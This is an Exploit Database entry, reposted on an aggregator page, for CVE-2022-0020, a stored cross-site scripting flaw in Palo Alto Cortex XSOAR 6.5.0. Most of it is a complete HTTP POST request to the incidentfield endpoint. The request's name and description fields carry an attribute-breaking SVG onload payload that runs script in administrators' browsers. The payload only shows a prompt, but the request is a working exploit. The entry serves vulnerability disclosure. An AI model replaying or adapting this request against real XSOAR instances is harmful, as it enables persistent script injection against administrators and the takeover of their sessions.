Palo Alto Cortex XSOAR 6.5.0 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 54 阅读

• 作者： omurugur
  日期： 2023-04-08
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51343/

• # Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
  # Exploit Author: omurugur
  # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
  # Version: 6.5.0 - 6.2.0 - 6.1.0
  # Tested on: [relevant os]
  # CVE : CVE-2022-0020
  # Author Web: https://www.justsecnow.com
  # Author Social: @omurugurrr
  
  
  A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
  Cortex XSOAR web interface enables an authenticated network-based attacker
  to store a persistent javascript payload that will perform arbitrary
  actions in the Cortex XSOAR web interface on behalf of authenticated
  administrators who encounter the payload during normal operations.
  
  POST /acc_UAB(MAY)/incidentfield HTTP/1.1
  Host: x.x.x.x
  Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
  isTimLicense=false
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
  Gecko/20100101 Firefox/94.0
  Accept: application/json
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://x.x.x.x/acc_UAB(MAY)
  Content-Type: application/json
  X-Xsrf-Token:
  Api_truncate_results: true
  Origin: https://x.x.x.x
  Content-Length: 373
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  Te: trailers
  Connection: close
  {"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
  edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
  
  Regards,
  
  Omur UGUR
  
  >